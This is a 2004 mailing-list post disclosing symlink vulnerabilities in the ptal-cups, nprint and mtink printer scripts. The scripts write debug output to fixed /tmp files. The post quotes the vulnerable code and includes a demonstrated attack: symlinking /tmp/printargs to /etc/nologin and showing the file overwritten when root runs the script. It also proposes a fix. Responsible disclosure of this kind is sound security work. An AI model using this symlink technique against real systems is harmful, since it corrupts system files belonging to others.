Menu
▾
▴
[hpoj-devel] Ptal-cups, nprint and mtink scripts security vulnerabilities.
|
From: <sha...@ya...> - 2004-03-20 17:23:53
|
Hello list,
---
This is my first post to the list, so please excuse me
if I have posted to the wrong list, or if I miss out
any information in the bug report.
---
I have discovered potential security issues in the
ptal cups backend script, nprint script and mtink
script, usually found in /usr/lib/cups/backend or
otherwise. The issues are symlink vulnerabilities,
and are due to insecure file handling.
From /usr/lib/cups/backend/ptal (linked to
/usr/bin/ptal-cups):
---
[...]
#DEBUG=true
### Where we log debug stuff to:
DEBUG_PRINTARGS=/tmp/printargs
DEBUG_PRINTOUT=/tmp/printout
if [ -n "$DEBUG" ]; then
echo "Args: $0 $*" > $DEBUG_PRINTARGS
echo "Arg1: $1" >> $DEBUG_PRINTARGS
echo "Arg2: $2" >> $DEBUG_PRINTARGS
echo "Arg3: $3" >> $DEBUG_PRINTARGS
echo "Arg4: $4" >> $DEBUG_PRINTARGS
echo "Arg5: $5" >> $DEBUG_PRINTARGS
echo "Arg6: $6" >> $DEBUG_PRINTARGS
echo "Arg7: $7" >> $DEBUG_PRINTARGS
command -V ptal-device >> $DEBUG_PRINTARGS
2>&1
command -V ptal-devid >> $DEBUG_PRINTARGS 2>&1
command -V ptal-connect >> $DEBUG_PRINTARGS
2>&1
command -V basename >> $DEBUG_PRINTARGS 2>&1
command -V cat >> $DEBUG_PRINTARGS 2>&1
declare >> $DEBUG_PRINTARGS
fi
[...]
if [ -n "$DEBUG" ]; then
echo "SENDTO: $SENDTO" >> $DEBUG_PRINTARGS
cat $FILE > $DEBUG_PRINTOUT
FILE=$DEBUG_PRINTOUT
fi
[...]
---
In various instances, 'echo' invokations are called in
the script to write debugging information to
/tmp/printargs ONLY IF DEBUGGING IS ENABLED (if DEBUG
is set). However, no file checks are performed on
/tmp/printargs for symlinks or otherwise an existance
of the file - this is a recipe for trouble, as an
attacker could simply create a symlink called
/tmp/printargs to a sensitive system file, and if
debugging in the script is enabled, the system file
*will* be corrupted.
Exactly the same vulnerability exists in the mtink and
nprint scripts. As seen below:
--- mtink script fragment ---
[...]
### Uncomment for crude debugging output
# DEBUG=true
### Where we log debug stuff to:
DEBUG_PRINTARGS=/tmp/printargs
DEBUG_PRINTOUT=/tmp/printout
if [ -n "$DEBUG" ]; then
echo "Args: $0 $*" > $DEBUG_PRINTARGS
echo "Arg1: $1" >> $DEBUG_PRINTARGS
echo "Arg2: $2" >> $DEBUG_PRINTARGS
echo "Arg3: $3" >> $DEBUG_PRINTARGS
echo "Arg4: $4" >> $DEBUG_PRINTARGS
echo "Arg5: $5" >> $DEBUG_PRINTARGS
echo "Arg6: $6" >> $DEBUG_PRINTARGS
echo "Arg7: $7" >> $DEBUG_PRINTARGS
command -V basename >> $DEBUG_PRINTARGS 2>&1
command -V cat >> $DEBUG_PRINTARGS 2>&1
declare >> $DEBUG_PRINTARGS
fi
[...]
if [ -n "$DEBUG" ]; then
echo "SENDTO: $SENDTO" >> $DEBUG_PRINTARGS
cat $FILE > $DEBUG_PRINTOUT
FILE=$DEBUG_PRINTOUT
fi
[...]
--- EOF
And in the nprint script:
--- nprint script fragment ---
[...]
### Uncomment for crude debugging output
#DEBUG=true
if [ ! -z "$DEBUG" ]; then
echo "Args: $0 $*" > /tmp/printargs
echo "Arg1: $1" >> /tmp/printargs
echo "Arg2: $2" >> /tmp/printargs
echo "Arg2: $3" >> /tmp/printargs
echo "Arg2: $4" >> /tmp/printargs
echo "Arg2: $5" >> /tmp/printargs
echo "Arg2: $6" >> /tmp/printargs
echo "Arg2: $7" >> /tmp/printargs
command -V pqlist >> /tmp/printargs 2>&1
command -V nprint >> /tmp/printargs 2>&1
command -V basename >> /tmp/printargs 2>&1
command -V cat >> /tmp/printargs 2>&1
declare -p >> /tmp/printargs
echo "pqlist\n------" >> /tmp/printargs
pqlist >> /tmp/printargs
fi
[...]
if [ ! -z "$DEBUG" ]; then
echo "SENDTO: $SENDTO" >> /tmp/printargs
cat $6 > /tmp/printout
cat /tmp/printout | nprint -q $SENDTO -
else
cat $FILE | nprint -q $SENDTO -
fi
[...]
--- EOF
Below, I will demonstrate how I can reproduce the
potential vulnerability using ptal-cups
(/usr/lib/cups/backend/ptal) script. This is a
genuine example attack I performed on my Mandrake
Linux system:
--- attack ---
[shaun@localhost shaun]$ ln -s /etc/nologin
/tmp/printargs
[...]
[root@localhost backend]# export DEBUG=true
[root@localhost backend]# ptal-cups
direct ptal-cups:/mlc:usb:PHOTOSMART_P1000
"HEWLETT-PACKARD PHOTOSMART P1000" "PTAL
mlc:usb:PHOTOSMART_P1000"
[root@localhost backend]#
[...]
[shaun@localhost shaun]$ cat /etc/nologin
Args: /usr/sbin/ptal-cups
Arg1:
Arg2:
Arg3:
Arg4:
Arg5:
Arg6:
Arg7:
ptal-device is /usr/bin/ptal-device
ptal-devid is /usr/bin/ptal-devid
ptal-connect is /usr/bin/ptal-connect
basename is /bin/basename
cat is /bin/cat
BASH=/bin/bash
BASH_VERSINFO=([0]="2" [1]="05b" [2]="0" [3]="1"
[4]="release" [5]="i586-mandrake-linux-gnu")
BASH_VERSION='2.05b.0(1)-release'
BROWSER=/usr/bin/mozilla
COLORTERM=
DEBUG=true
DEBUG_PRINTARGS=/tmp/printargs
DEBUG_PRINTOUT=/tmp/printout
DIRSTACK=()
DISPLAY=:0.0
ENV=/root/.bashrc
EUID=0
GDK_USE_XFT=1
GNOME_DISABLE_CRASH_DIALOG=1
GROUPS=()
G_BROKEN_FILENAMES=1
HELP_BROWSER=/usr/bin/mozilla
HISTCONTROL=ignoredups
HISTSIZE=1000
HOME=/root
HOSTNAME=localhost.localdomain
HOSTTYPE=i586
IFS=$' \t\n'
INPUTRC=/etc/inputrc
KONSOLE_DCOP='DCOPRef(konsole-1482,konsole)'
KONSOLE_DCOP_SESSION='DCOPRef(konsole-1482,session-3)'
LANG=en_GB
LANGUAGE=en_GB:en
LC_COLLATE=en_GB
LC_CTYPE=en_GB
LC_MESSAGES=en_GB
LC_MONETARY=en_GB
LC_NUMERIC=en_GB
LC_TIME=en_GB
LESS=-MM
LESSKEY=/etc/.less
LESSOPEN='|/usr/bin/lesspipe.sh %s'
LOGNAME=shaun
LS_COLORS='no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.tbz2=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lha=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:*.tiff=01;35:'
MACHTYPE=i586-mandrake-linux-gnu
MAIL=/var/spool/mail/shaun
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/local/sbin:/usr/bin:/bin:/usr/bin:/usr/local/bin
PIPESTATUS=([0]="0")
PPID=4548
PS4='+ '
PWD=/usr/lib/cups/backend
QT_XFT=0
SECURE_LEVEL=2
SHELL=/bin/bash
SHELLOPTS=braceexpand:hashall:interactive-comments
SHLVL=4
TERM=xterm
UID=0
USER=shaun
USERNAME=root
XAUTHORITY=/home/shaun/.Xauthority
XDM_MANAGED=/var/run/xdmctl/xdmctl-:0,maysd,mayfn,sched
XMODIFIERS=@im=none
_=cat
MFG:HEWLETT-PACKARD;MDL:PHOTOSMART
P1000;CMD:MLC,PCL,PML;CLASS:PRINTER;DESCRIPTION:Hewlett-Packard
PhotoSmart
P1000;SERN:ES16C1907ZHP;VSTATUS:$HB0$NC0,ff,DN,IDLE,CUT,K0,C3,SM,NR,KP041,CP000;VP:0800,FL,B0;VJ:
;
[...]
--- EO attack
As can be seen above, I created a link from
/tmp/printargs, enabled debugging as root (I could've
also uncommented the "#DEBUG=true" line in the ptal
backend), and ran the ptal-cups script as root. Then,
I tested if the attack had worked, by checking the
contents of /etc/nologin - it had clearly written to
/etc/nologin.
BTW, the vulnerability only exists if debugging is
enabled, by setting the DEBUG variable to non-null.
However, I am betting that at least a few people in
the world have debugging enabled in ptal-cups, nprint
or the mtink script. If debugging is enabled, the
consequences could be quite severe. In my opinion,
this is most definately a security issue.
****
My system:
---
[shaun@localhost shaun]$ uname --al
Linux localhost.localdomain 2.4.19-16mdk #1 Fri Sep 20
18:15:05 CEST 2002 i686 unknown unknown GNU/Linux
[shaun@localhost shaun]$
---
****
A suggested fix for this is to check for the existance
of /tmp/printargs and /tmp/printout before writing to
them. Maybe use a 'if [ -e ...]' type statement.
If anybody needs more info, don't hesistate to ask :)
How many people here have debugging enabled in their
tal-cups, nprint and mtink scripts, BTW?
Thank you for your time.
Shaun.
___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
http://uk.messenger.yahoo.com/download/index.html
|
